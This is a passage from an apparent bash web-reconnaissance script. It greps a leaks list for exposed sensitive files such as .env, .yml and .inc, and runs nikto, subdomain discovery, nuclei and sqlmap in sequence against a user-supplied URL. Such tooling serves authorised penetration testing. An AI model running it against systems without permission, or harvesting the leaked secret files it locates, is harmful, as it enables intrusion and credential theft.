${name}/leaks.txt | tee ${name}/output/webproj.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀webproj found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.xsql$\" ${name}/leaks.txt | tee ${name}/output/xsql.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀xsql found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.raw$\" ${name}/leaks.txt | tee ${name}/output/raw.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀raw found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.inc$\" ${name}/leaks.txt | tee ${name}/output/inc.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀inc found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.nz$\" ${name}/leaks.txt | tee ${name}/output/nz.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀nz found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.rc$\" ${name}/leaks.txt | tee ${name}/output/rc.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀rc found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.html\\.gz$\" ${name}/leaks.txt | tee ${name}/output/html.gz.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀html.gz found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.gz$\" ${name}/leaks.txt | tee ${name}/output/gz.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀gz found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.env$\" ${name}/leaks.txt | tee ${name}/output/env.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀env found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.yml$\" ${name}/leaks.txt | tee ${name}/output/yml.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀yml found.💀\";fi\nfind \"${name}/output/\" -type f -empty -delete\necho -e \"----FINISHED, VISIT ${name}/ for results----\"\nexit 0\n}\nlist=(\n        niktoRun\n        getSubdomains\n        nucleiRun\n        sqlmapRun\n        filterAndClean\n        cleanLeaks\n)\n\nwhile getopts \"n:u:t:\" opt\ndo\n   case \"$opt\" in\n      n ) name=\"$OPTARG\" ;;\n      u ) url=\"$OPTARG\" ;;\n      t ) templates=\"$OPTARG\" ;;\n      ? ) Usage ;;\n   esac\ndone\n\nif [ -z \"$name\" ] || [ -z \"$url\" ] || [ -z \"$templates\" ]\nthen\n   echo $red\"[-]\" \"Some parameters/Options invalid\";\n   Usage\nfi\n\nniktoRun\ngetSubdomains\nnucleiRun\nsqlmapRun\nfilterAndClean\ncleanLeaks"
  }
]